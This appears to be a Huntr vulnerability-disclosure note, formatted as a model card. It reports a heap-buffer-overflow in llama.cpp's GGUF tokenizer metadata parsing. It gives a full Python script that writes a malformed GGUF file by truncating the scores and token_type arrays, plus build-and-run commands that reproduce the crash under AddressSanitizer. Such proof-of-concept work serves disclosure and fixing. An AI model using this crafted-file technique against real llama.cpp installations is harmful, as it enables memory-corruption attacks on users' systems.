|
|
--- |
|
|
license: other |
|
|
language: |
|
|
- en |
|
|
tags: |
|
|
- security |
|
|
- gguf |
|
|
- poc |
|
|
- llama-cpp |
|
|
- huntr |
|
|
library_name: llama-cpp |
|
|
--- |
|
|
|
|
|
# Huntr submission notes |
|
|
|
|
|
This folder contains a status summary and repro steps for a GGUF heap-buffer-overflow in tokenizer metadata parsing. |
|
|
|
|
|
Files |
|
|
- huntr_submission/STATUS.md |
|
|
|
|
|
PoC model file |
|
|
- tmp/gguf_fuzz/llama-spm-bad-scores.gguf |
|
|
|
|
|
Base model file |
|
|
- models/ggml-vocab-llama-spm.gguf |
|
|
|
|
|
PoC generation |
|
|
- The PoC is created by truncating tokenizer.ggml.scores and tokenizer.ggml.token_type by 1 element. |
|
|
- Script used: |
|
|
|
|
|
```python |
|
|
import struct |
|
|
from pathlib import Path |
|
|
|
|
|
in_path = Path('models/ggml-vocab-llama-spm.gguf') |
|
|
out_path = Path('tmp/gguf_fuzz/llama-spm-bad-scores.gguf') |
|
|
|
|
|
GGUF_TYPE_SIZES = { |
|
|
0: 1, 1: 1, 2: 2, 3: 2, 4: 4, 5: 4, 6: 4, 7: 1, 8: None, 9: None, 10: 8, 11: 8, 12: 8, |
|
|
} |
|
|
GGUF_TYPE_FORMAT = { |
|
|
0: '<B', 1: '<b', 2: '<H', 3: '<h', 4: '<I', 5: '<i', 6: '<f', 7: '<b', 10: '<Q', 11: '<q', 12: '<d', |
|
|
} |
|
|
|
|
|
def read_exact(f, n): |
|
|
b = f.read(n) |
|
|
if len(b) != n: |
|
|
raise EOFError('unexpected EOF') |
|
|
return b |
|
|
|
|
|
def read_u32(f): return struct.unpack('<I', read_exact(f, 4))[0] |
|
|
def read_i32(f): return struct.unpack('<i', read_exact(f, 4))[0] |
|
|
def read_u64(f): return struct.unpack('<Q', read_exact(f, 8))[0] |
|
|
def read_i64(f): return struct.unpack('<q', read_exact(f, 8))[0] |
|
|
|
|
|
def read_string(f): |
|
|
n = read_u64(f) |
|
|
return read_exact(f, n) |
|
|
|
|
|
def parse_file(path): |
|
|
with open(path, 'rb') as f: |
|
|
magic = read_exact(f, 4) |
|
|
version = read_u32(f) |
|
|
n_tensors = read_i64(f) |
|
|
n_kv = read_i64(f) |
|
|
kv_list = [] |
|
|
for _ in range(n_kv): |
|
|
key = read_string(f) |
|
|
vtype = read_i32(f) |
|
|
if vtype == 9: |
|
|
arr_type = read_i32(f) |
|
|
arr_len = read_u64(f) |
|
|
if arr_type == 8: |
|
|
vals = [read_string(f) for _ in range(arr_len)] |
|
|
else: |
|
|
size = GGUF_TYPE_SIZES[arr_type] |
|
|
data = read_exact(f, size * arr_len) |
|
|
fmt = GGUF_TYPE_FORMAT[arr_type] |
|
|
vals = list(struct.unpack('<' + fmt[1] * arr_len, data)) |
|
|
kv_list.append((key, vtype, arr_type, vals)) |
|
|
elif vtype == 8: |
|
|
val = read_string(f) |
|
|
kv_list.append((key, vtype, None, val)) |
|
|
else: |
|
|
size = GGUF_TYPE_SIZES[vtype] |
|
|
val = struct.unpack(GGUF_TYPE_FORMAT[vtype], read_exact(f, size))[0] |
|
|
kv_list.append((key, vtype, None, val)) |
|
|
return magic, version, n_tensors, kv_list |
|
|
|
|
|
def write_file(path, magic, version, n_tensors, kv_list): |
|
|
with open(path, 'wb') as f: |
|
|
f.write(magic) |
|
|
f.write(struct.pack('<I', version)) |
|
|
f.write(struct.pack('<q', n_tensors)) |
|
|
f.write(struct.pack('<q', len(kv_list))) |
|
|
for key, vtype, arr_type, val in kv_list: |
|
|
f.write(struct.pack('<Q', len(key))) |
|
|
f.write(key) |
|
|
f.write(struct.pack('<i', vtype)) |
|
|
if vtype == 9: |
|
|
f.write(struct.pack('<i', arr_type)) |
|
|
f.write(struct.pack('<Q', len(val))) |
|
|
if arr_type == 8: |
|
|
for s in val: |
|
|
f.write(struct.pack('<Q', len(s))) |
|
|
f.write(s) |
|
|
else: |
|
|
fmt = GGUF_TYPE_FORMAT[arr_type] |
|
|
f.write(struct.pack('<' + fmt[1] * len(val), *val)) |
|
|
elif vtype == 8: |
|
|
f.write(struct.pack('<Q', len(val))) |
|
|
f.write(val) |
|
|
else: |
|
|
f.write(struct.pack(GGUF_TYPE_FORMAT[vtype], val)) |
|
|
|
|
|
magic, version, n_tensors, kv_list = parse_file(in_path) |
|
|
new_kv = [] |
|
|
for key, vtype, arr_type, val in kv_list: |
|
|
if key == b'tokenizer.ggml.scores' and vtype == 9: |
|
|
val = val[:-1] |
|
|
if key == b'tokenizer.ggml.token_type' and vtype == 9: |
|
|
val = val[:-1] |
|
|
new_kv.append((key, vtype, arr_type, val)) |
|
|
|
|
|
write_file(out_path, magic, version, n_tensors, new_kv) |
|
|
print('wrote', out_path) |
|
|
``` |
|
|
|
|
|
Repro (ASan) |
|
|
```bash |
|
|
cmake -B build-asan -DLLAMA_SANITIZE_ADDRESS=ON -DLLAMA_SANITIZE_UNDEFINED=ON -DGGML_SANITIZE_ADDRESS=ON -DGGML_SANITIZE_UNDEFINED=ON -DGGML_CCACHE=OFF -DLLAMA_BUILD_TESTS=ON -DLLAMA_BUILD_EXAMPLES=ON -DLLAMA_BUILD_TOOLS=ON -DLLAMA_BUILD_SERVER=OFF -DCMAKE_BUILD_TYPE=RelWithDebInfo |
|
|
cmake --build build-asan --target llama-tokenize -j $(getconf _NPROCESSORS_ONLN) |
|
|
./build-asan/bin/llama-tokenize -m tmp/gguf_fuzz/llama-spm-bad-scores.gguf -p "hello" |
|
|
``` |
|
|
|